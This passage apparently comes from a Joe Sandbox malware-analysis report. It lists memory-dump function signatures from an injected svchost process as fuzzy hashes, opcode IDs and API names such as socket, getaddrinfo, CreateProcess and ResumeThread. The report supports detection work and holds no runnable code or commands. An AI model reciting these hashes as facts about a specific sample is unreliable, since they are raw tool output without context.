                                                                                                                • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                • Instruction ID: 6d6629c0a82abce1fcb4800fb2e1fdaa6fe7f8bc5fe324a9e81d0288b070a614
                                                                                                                • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                • Instruction Fuzzy Hash: EEB1893165CE844AE729A71894956EBB7F1FFD4341F60066EE0CFC2183DE38E606C696
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3038234982.0000020D0A290000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020D0A290000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_20d0a290000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID: x
                                                                                                                • API String ID: 3298025750-2363233923
                                                                                                                • Opcode ID: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                • Instruction ID: 9ea27a3bf8d0395e1c6cbd6d449dc12aad3e60a42eb621bb918d3e019d84c90a
                                                                                                                • Opcode Fuzzy Hash: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                • Instruction Fuzzy Hash: 21B13631618B580BD73DEA7C88896BA77D2FB85700F10163EE4DBC7183ED70D946868A
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile$AcceptConnectMappingPortcalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2835849967-0
                                                                                                                • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                • Instruction ID: 531f2947b5434453ef3d06bf0e9937c24c7eb899e1e6546627761ca3816df2b4
                                                                                                                • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                • Instruction Fuzzy Hash: E2D17B3155CB888BD765EF28D4856EBB7E0FF94341F10462EE48FC3291EB74A4458B92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateReadmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3950102678-0
                                                                                                                • Opcode ID: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                • Instruction ID: 645147dc743f0630a7c444c541c0e48a6efa6db63888f643200ba8babfce6020
                                                                                                                • Opcode Fuzzy Hash: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                • Instruction Fuzzy Hash: 3F71867064CF844FE7549F6894C53AAB6E1FF98341F600A3FE58FC3292DB34A8458652
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 3388366904-0
                                                                                                                • Opcode ID: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                • Instruction ID: 443785c5b89ac7423ad2dd630fc41dbf0816b981a6362af50330525c8f77a1ce
                                                                                                                • Opcode Fuzzy Hash: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                • Instruction Fuzzy Hash: C841B37064CA484FEB58EB289C856AA73F5FFD9751F10462EE88FC2191EB34D9018792
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3755109111-0
                                                                                                                • Opcode ID: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                • Instruction ID: 8fe4637310942cf4705cf4d5b63ccd24eb1997ef65a2ccd7a75ee692585f163f
                                                                                                                • Opcode Fuzzy Hash: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                • Instruction Fuzzy Hash: AA41F530618E444FE758AB28D89C6BB37F5FF89361F60023BE45FC2291DB38D8018692
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3755109111-0
                                                                                                                • Opcode ID: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                • Instruction ID: 41048aca3cc32c8ab4ac5e7fcb38350795021c6c1ed636b073161a159837a9ee
                                                                                                                • Opcode Fuzzy Hash: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                • Instruction Fuzzy Hash: EA31B430748D584FFB549A2898842AA32F4FF85355F60027AD80FD2186EB2AFC4586A1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 3388366904-0
                                                                                                                • Opcode ID: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                • Instruction ID: 59de7ec73fe14366de1fd4ae85c51f5e434a4753979b77326f97cb985cc3c295
                                                                                                                • Opcode Fuzzy Hash: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                • Instruction Fuzzy Hash: 8E21C97174CB444BE3649A58A8C627A73E4EF99750F10423EE98FC2242DB75A9064692
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initializefree
                                                                                                                • String ID:
                                                                                                                • API String ID: 1505762977-0
                                                                                                                • Opcode ID: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                • Instruction ID: 26e3fb4216d8a412ef527143183e8a9c4612ecc9013ec567061a1aa7d6a21a17
                                                                                                                • Opcode Fuzzy Hash: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                • Instruction Fuzzy Hash: 1B218E30608A088FDF94EF28D849A9A77E0FF98315F00462AB80FD3191DB39E841CB91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$AcceptConnectNameName_Portcallocfreemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2547275272-0
                                                                                                                • Opcode ID: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                • Instruction ID: 6259f17da5878008478a99f96153e65837a9af3eab23bcb147003068a957d363
                                                                                                                • Opcode Fuzzy Hash: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                • Instruction Fuzzy Hash: AB012B31214E084FE748BB5CEC895F677D5EB99762714427AE40BC3261DE35D8418BD1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3038234982.0000020D0A290000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020D0A290000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_20d0a290000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                • Instruction ID: bde068c2662cb4af3db3472c4e8c208d8919936bfcf5e6aeef8897159f9a4e4b
                                                                                                                • Opcode Fuzzy Hash: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                • Instruction Fuzzy Hash: D2C1A930618B098FDB58EF6CC489BAAB7E1FB98710F00552DE48EC7256DB74E845C786
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileMapping
                                                                                                                • String ID:
                                                                                                                • API String ID: 524692379-0
                                                                                                                • Opcode ID: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                • Instruction ID: 0ede745c464ee9d0b753fb76ebfc2e00b3192146997a327ecae152fb59c701d5
                                                                                                                • Opcode Fuzzy Hash: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                • Instruction Fuzzy Hash: DAB14D71648E888FE755EF28D4846EAB7E1FF94341F204A2EE04FC71A1DB34A545CB91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2635317215-0
                                                                                                                • Opcode ID: 1935e8272a952c94eeb7b0263a2bf8b20741ad021aae08b9be19f7e86bf12586
                                                                                                                • Instruction ID: 323568fa2778899733527087818601bbd49d4c6e647cb5d4e1d6e9eafd68052a
                                                                                                                • Opcode Fuzzy Hash: 1935e8272a952c94eeb7b0263a2bf8b20741ad021aae08b9be19f7e86bf12586
                                                                                                                • Instruction Fuzzy Hash: 88124F3191CE888AEBB8EF188885BE773E5FF94300F60057AD84EC7185EB34E9458791
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 98920635-0
                                                                                                                • Opcode ID: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                • Instruction ID: 6d8a4954932e76ea6d0b32d59acbf5865fcfab293c0e30eb91c15554891b8024
                                                                                                                • Opcode Fuzzy Hash: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                • Instruction Fuzzy Hash: E8914C70658E498FEB94DF28C4886A677F0FF54355F60026AD84FC65A1EB39F840CB61
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 2039140958-0
                                                                                                                • Opcode ID: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                • Instruction ID: eb692ce17e54ec6cd97b5a8ec573062f15fe7b1a554abac4958bc47580b2741c
                                                                                                                • Opcode Fuzzy Hash: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                • Instruction Fuzzy Hash: 46615971548A888BD765EF64D8946EBB7E1FF98340F100A2EE48FC3191DF39A6458B42
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                • Instruction ID: 63171602ce55c1f84fa0187951d8285ddbf5beca0a2a049035a88a4760e41426
                                                                                                                • Opcode Fuzzy Hash: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                • Instruction Fuzzy Hash: 7251523565CB848FE764DB18D8457ABB7E5FF98350F10062EE48EC3191DB74E9018B62
                                                                                                                APIs
                                                                                                                • TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF415A837B8), ref: 00007DF415A885F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3978063606-0
                                                                                                                • Opcode ID: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                • Instruction ID: 57c3c37aa210ca6148ee65f60962b38604c62e59c155fb788e3fa79bb1e45efc
                                                                                                                • Opcode Fuzzy Hash: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                • Instruction Fuzzy Hash: 7D41E630B88E894FEB58FB28D4954AA73A1FF48741B244626E40FC7281DF39FC058B91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                • Instruction ID: 69523233f83c648a88e371d7f6eb2a6e9baabe9eaca0c2844e84188368026875
                                                                                                                • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                • Instruction Fuzzy Hash: DA318721B98D855BEB54FB68DC925EE72F2EF44341B60063BD00FC32E2DB19ED4546A1

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.3444451166.0000020D09DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020D09DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_20d09dc0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1088084561-0
                                                                                                                • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                • Instruction ID: 66a06ca1daed49353a4bfcb4371b411dca62801f2f4f917f717e06d4c6431181
                                                                                                                • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                • Instruction Fuzzy Hash: 1331A570149B274AEBA59BA884987F1F2D2EBA4310F1442B9C029D71D3EE75C94AD760
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 98920635-0
                                                                                                                • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                • Instruction ID: 6a462db583adec36d46ce2d01a29cb6cd403a5921327665ee897b27549a6807c
                                                                                                                • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                • Instruction Fuzzy Hash: 31219930708D044FEB58DB7898896A677F1EF95365F20477AD82FC72D5DB28AC014761
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: getaddrinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 300660673-0
                                                                                                                • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                • Instruction ID: 9196b515448980ab32b897207e85b44bede09a14edaeec369d113afc546f74ea
                                                                                                                • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                • Instruction Fuzzy Hash: 4F316D70648E488FEB54DF24C898B5677E1FFA8705F104279D84EDB295DB39E802CB51
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 98920635-0
                                                                                                                • Opcode ID: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                • Instruction ID: 734dd4dd9880a4a639e45af984ae6f27127b168f85d7f2d1a677faa12c9f8999
                                                                                                                • Opcode Fuzzy Hash: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                • Instruction Fuzzy Hash: 7C11B730748D094FE7589B6C88847A672F1FFC9364F60077AE51FC22C2DB28AC028250
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                • Instruction ID: 1fa893f836e82f1a04d88e881d47cc62a4f2cbd8b271f7af11d7f1d05544ef6e
                                                                                                                • Opcode Fuzzy Hash: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                • Instruction Fuzzy Hash: 8501A230A54D098FDB54AB69DC8866673E6FFC8351B544175E80EC7144DB76A881CBA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: closesocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2781271927-0
                                                                                                                • Opcode ID: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                • Instruction ID: 51cbdf3cbaed2f8c47c883e5b0a96964c769119fe3404eb3c0e7efaa6abd5587
                                                                                                                • Opcode Fuzzy Hash: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                • Instruction Fuzzy Hash: 5B012C70954A498FEB84DF18C4C87613AE4FF95329F5422A6DC0ACA296D375D890C780
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 10892065-0
                                                                                                                • Opcode ID: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                • Instruction ID: 6ab1ddc907f6b2c839cef875c4a4f724ab8b005ee3cb781928a3919853c5334c
                                                                                                                • Opcode Fuzzy Hash: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                • Instruction Fuzzy Hash: 91F0E521E4CD4C4FE714BA7A6CC42A621A2EFC4360F34467BD50FC2582DB7B89C15270
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCallerProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2663294120-0
                                                                                                                • Opcode ID: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                • Instruction ID: 51d636d2db1095086f3772483f2583fd5a90b5c0ec927dc10539125a9cbaca19
                                                                                                                • Opcode Fuzzy Hash: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                • Instruction Fuzzy Hash: 08E0C211B08C0D1B6B6861AE288D5BB55D6DBDC173314027BE41EC3295ED15CC810390
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                • Instruction ID: 185d46c588ea2e4567bcae6b34181abe55dfdcdb206542bcc00ac7c0aea2c954
                                                                                                                • Opcode Fuzzy Hash: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                • Instruction Fuzzy Hash: 93E0C232B191240BE72C6ABD2C8917A36CAC7CC572B06827BFC06C3284DC68CC5602D0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                • Instruction ID: 8bcef03e4c36fcdaf45cf494b23375f10c3e5f57cc34b78391dc045b8c13580e
                                                                                                                • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                • Instruction Fuzzy Hash: DAD0A7107A4D0D0FEA48673D1C957AA51D5EFDC362F61023BF50EC2381EA59CC550314
                                                                                                                APIs
                                                                                                                • GetSystemInfo.KERNELBASE(?,00007DF415B0EF2F,?,?,?,?,00000000,00000000), ref: 00007DF415AFD689
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 31276548-0
                                                                                                                • Opcode ID: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                • Instruction ID: 7569d89867c29b0a03cd0ad5d22d2158622d53a1266560ec3666146a2bf26abe
                                                                                                                • Opcode Fuzzy Hash: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                • Instruction Fuzzy Hash: 11E01A316548088AF349F731DC994E77361FFA6300B904663980B810E6EE6DA24ACA91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007DF415A9E150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF415A9C0F7), ref: 00007DF415A9E160
                                                                                                                • malloc.MSVCRT ref: 00007DF415A8DB44
                                                                                                                  • Part of subcall function 00007DF415A977EC: malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF415AB740A), ref: 00007DF415A9780B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc$AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1211516610-0
                                                                                                                • Opcode ID: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                • Instruction ID: e06269efe844f288c05beca960f1881c34b9b2761f9e201e8e70fdf4332ccee9
                                                                                                                • Opcode Fuzzy Hash: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                • Instruction Fuzzy Hash: 6A416D70548A4C8FDB64EF18D8897E677E5FF58341F24026AD84ECB251DB34E984CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
